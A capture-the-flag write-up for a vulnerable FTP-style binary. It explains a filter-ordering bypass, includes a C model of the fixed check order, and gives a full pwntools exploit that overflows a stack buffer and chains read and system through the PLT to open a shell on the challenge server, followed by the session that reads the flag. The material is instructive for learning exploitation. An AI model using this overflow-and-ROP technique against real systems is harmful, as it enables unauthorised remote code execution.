ctftp [pwn]

ctftp

Just what the world needs... another vulnerable FTP server. Have fun.

nc chal.tuctf.com 30500

Recon

ctftp is a Linux binary which asks for a username and then offers to list or get files.

$ file ctftp 
ctftp: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-, BuildID[sha1]=fee7d187626ef9b20f3eb50b1047438c6df6c9d3, for GNU/Linux 3.2.0, not stripped
$ checksec cftp
[*] 'cftp'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
$ ./cftp 
Welcome to the CTFTP: the netcat-based FTP server
Enter your name: asby
Welcome asby, feel free to browse my wares

Choose a command:
1) List Files
2) Get Files
> 1
ctftp
firefox.png
flags
gitlab.png
lorem.txt
rockyou.zip
stack_smashing.pdf
usernames.txt
...
> 2
> 2
Enter filename: /etc/passwd
File not found: 'etcpasswd'

The filename goes through two checks. restrictedFiles() is run first, on the raw input, and refuses names such as ctftp; only afterwards does filter() strip characters like /, which is why /etc/passwd turns into etcpasswd and the flags directory cannot be opened. Because the denylist runs before the filter, c/t/f/t/p is not recognised as ctftp but is filtered down to exactly that name, so the binary itself can be downloaded. Not that it helped much, since it was also provided with the challenge.

The more useful bug is a stack buffer overflow in get(): the filename buffer is 0x40 bytes, but read() is allowed to write 0x80 bytes into it.

// Hex-Rays output for get(), lightly annotated. The buffer sits at ebp-0x48,
// so 0x48 bytes of padding plus the 4-byte saved ebp (76 bytes in total)
// reach the saved return address.
void get()
{
  char s[0x40]; // [sp+0h] [bp-48h]: 64-byte filename buffer
  int v1;       // [sp+40h] [bp-8h]: number of bytes read

  printf("Enter filename: ");
  memset(s, 0, 0x40u);
  v1 = read(0, s, 0x80u);       // up to 0x80 bytes into a 0x40-byte buffer: overflow
  if ( !restrictedFiles(s) )    // denylist is checked on the raw input...
  {
    filter(s, v1);              // ...and only then are characters such as '/' stripped
    if ( !checkFile(s) )
    {
      printf("Sending File: %s\n", s);
      sendFile(s);
    }
  }
}
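The check ordering is worth seeing in compilable form. The C model below is an added example, not the challenge's source: only the call order (restrictedFiles() before filter()) and the 0x40-byte buffer are taken from the decompiled get() above, while the denylist contents, the substring matching and the exact character set the filter strips are assumptions. The fixed variant filters first and checks the result, and bounds the copy to the buffer instead of letting an oversized request overflow it.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define BUF_LEN 0x40   /* same size as the filename buffer in get() */

/* Model of restrictedFiles(): true if the name must not be served.
 * Assumption: substring match against a small denylist. */
static bool restricted_files(const char *name)
{
    static const char *const deny[] = { "ctftp", "flags" };
    for (size_t i = 0; i < sizeof deny / sizeof deny[0]; i++)
        if (strstr(name, deny[i]) != NULL)
            return true;
    return false;
}

/* Model of filter(): strips '/' and line terminators in place.
 * Assumption: the real filter may strip further characters. */
static void filter(char *s)
{
    size_t out = 0;
    for (size_t i = 0; s[i] != '\0'; i++) {
        if (s[i] == '/' || s[i] == '\n' || s[i] == '\r')
            continue;
        s[out++] = s[i];
    }
    s[out] = '\0';
}

/* Copies the request into the filename buffer, refusing anything that does
 * not fit (the real get() lets read() write 0x80 bytes into 0x40). */
static bool copy_request(const char *input, char *out, size_t outlen)
{
    if (strlen(input) >= outlen)
        return false;
    strcpy(out, input);
    return true;
}

/* Vulnerable order, as in the binary: denylist on the raw input, then filter.
 * Returns true if the name left in `out` would be sent. */
bool serves_vulnerable(const char *input, char *out, size_t outlen)
{
    if (!copy_request(input, out, outlen))
        return false;
    if (restricted_files(out))      /* sees "c/t/f/t/p", not "ctftp" */
        return false;
    filter(out);                    /* now turns it into "ctftp" */
    return true;
}

/* Fixed order: canonicalise first, then check what will actually be opened. */
bool serves_fixed(const char *input, char *out, size_t outlen)
{
    if (!copy_request(input, out, outlen))
        return false;
    filter(out);
    if (restricted_files(out))
        return false;
    return true;
}

/* Wrappers over a fresh buffer: return the name that would be served, or NULL. */
const char *vulnerable_serves(const char *input)
{
    static char buf[BUF_LEN];
    return serves_vulnerable(input, buf, sizeof buf) ? buf : NULL;
}

const char *fixed_serves(const char *input)
{
    static char buf[BUF_LEN];
    return serves_fixed(input, buf, sizeof buf) ? buf : NULL;
}

int main(void)
{
    /* Constructed requests, as they would arrive from netcat (with newline). */
    const char *requests[] = { "ctftp\n", "c/t/f/t/p\n", "/etc/passwd\n", "flags/flag.txt\n" };
    const char *labels[]   = { "ctftp",   "c/t/f/t/p",   "/etc/passwd",   "flags/flag.txt" };

    for (size_t i = 0; i < sizeof requests / sizeof requests[0]; i++) {
        const char *v = vulnerable_serves(requests[i]);
        const char *f = fixed_serves(requests[i]);
        printf("%-15s  binary's order: %-10s  fixed order: %s\n", labels[i],
               v ? v : "(refused)", f ? f : "(refused)");
    }
    return 0;
}
```

In the binary's order the request c/t/f/t/p passes the denylist and is then filtered to ctftp, exactly the bypass described above; in the fixed order the filtered name is what gets checked, so the same request is refused while an ordinary name like /etc/passwd still becomes etcpasswd in both.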

The overflow lets us overwrite the saved return address. The binary is not PIE and already links read and system, so their PLT stubs sit at fixed addresses and no leak is needed: a short ROP chain calls read(0, .data, 7) to place "/bin/sh" in a writable section, discards the three arguments with a pop; pop; pop; ret gadget, and then calls system(.data). The command cannot simply be put in the filename buffer, because filter() would strip its slashes; sending it afterwards, to the read() in the chain, sidesteps the filter entirely.

Code

#!/usr/bin/env python3
# Exploit for ctftp: stack buffer overflow in get() -> ROP through the PLT.
# No PIE, so every address below is fixed. Run with REMOTE=1 to hit the server.

from pwn import *

context.arch = "i386"

if args.REMOTE:
    s = remote("chal.tuctf.com", 30500)
else:
    s = process("./cftp")

adata = 0x0804c054      # writable .data: "/bin/sh" is read into here

asys = 0x80490b0        # system@plt
aread = 0x8049030       # read@plt
cmd = b"/bin/sh"
dummy = b"BBBB"         # fake return address for system(); only reached after the shell exits

popret3 = 0x080497e1    # pop; pop; pop; ret: drops read()'s three arguments

print(s.recvuntil(b"name: ").decode())
s.send(b"asby\n")
print(s.recvuntil(b"> ").decode())
s.send(b"2\n")

# 0x48 bytes from the buffer to the saved ebp, plus the 4-byte saved ebp itself
buf = b"A" * 76

# read(0, adata, len(cmd)) writes the command into .data
buf += p32(aread)
buf += p32(popret3)
buf += p32(0)
buf += p32(adata)
buf += p32(len(cmd))

# system(adata) -> /bin/sh
buf += p32(asys)
buf += dummy
buf += p32(adata)
s.send(buf)
s.send(cmd)             # consumed by the read() in the chain, never by filter()
s.interactive()

Flag

$ ./ftp.py 
[+] Starting local process './cftp': pid 28089
[+] Opening connection to chal.tuctf.com on port 30500: Done
Welcome to the CTFTP: the netcat-based FTP server
Enter your name: 
Welcome /bin/sh, feel free to browse my wares

Choose a command:
1) List Files
2) Get Files
> 
[*] Switching to interactive mode
Enter filename: File not found: 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAt'
$ sh -i
$ 
$ ls -la
total 52808
dr-xr-xr-x 1 root root     4096 Nov 29 08:28 .
drwxr-xr-x 1 root root     4096 Nov 21 23:14 ..
-r-xr-xr-x 1 root root    16188 Nov 29 08:25 ctftp
-r--r--r-- 1 root root   260421 Nov 29 08:24 firefox.png
dr-xr-xr-x 1 root root     4096 Nov 22 00:14 flags
-r--r--r-- 1 root root     4604 Nov 29 08:24 gitlab.png
-r--r--r-- 1 root root      446 Nov 29 08:24 lorem.txt
-r--r--r-- 1 root root 53357204 Nov 29 08:24 rockyou.zip
-r--r--r-- 1 root root   408599 Nov 29 08:24 stack_smashing.pdf
-r--r--r-- 1 root root      707 Nov 29 08:24 usernames.txt
$ ls -la flags
total 12
dr-xr-xr-x 1 root root 4096 Nov 22 00:14 .
dr-xr-xr-x 1 root root 4096 Nov 29 08:28 ..
-r--r--r-- 1 root root   58 Nov 29 08:25 flag.txt
$ cat flags/flag.txt
TUCTF{f1l73r_f1r57_7h3y_541d._y0u'll_b3_53cur3_7h3y_541d}

Running the exploit gives us the flag TUCTF{f1l73r_f1r57_7h3y_541d._y0u'll_b3_53cur3_7h3y_541d}